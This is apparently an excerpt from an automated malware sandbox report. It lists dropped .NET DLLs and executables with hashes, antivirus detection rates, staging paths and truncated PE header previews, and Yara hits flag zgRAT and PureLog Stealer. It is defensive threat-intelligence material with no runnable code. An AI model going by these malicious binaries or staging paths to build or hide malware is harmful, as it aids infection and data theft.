                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32256
                                                                                                                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                            Entropy (8bit):5.645950918301459
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                            MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                            SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                            SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                            SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32256
                                                                                                                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):69632
                                                                                                                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85504
                                                                                                                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23552
                                                                                                                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):69632
                                                                                                                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                            Entropy (8bit):5.645950918301459
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                            MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                            SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                            SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                            SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                            Entropy (8bit):5.645950918301459
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                            MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                            SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                            SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                            SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85504
                                                                                                                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85504
                                                                                                                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):69632
                                                                                                                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32256
                                                                                                                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2284739
                                                                                                                                                                                                            Entropy (8bit):7.490456730492454
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
                                                                                                                                                                                                            MD5:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                                                            SHA1:F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
                                                                                                                                                                                                            SHA-256:7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
                                                                                                                                                                                                            SHA-512:082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):370176
                                                                                                                                                                                                            Entropy (8bit):7.990824056166435
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
                                                                                                                                                                                                            MD5:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                                                            SHA1:37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
                                                                                                                                                                                                            SHA-256:D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
                                                                                                                                                                                                            SHA-512:01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j|.M.........M.;.*.q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$|(.gE.N...3.J..*T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1224
                                                                                                                                                                                                            Entropy (8bit):4.435108676655666
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                                                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                                                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                                                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                                                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                                                                                            Malicious:false
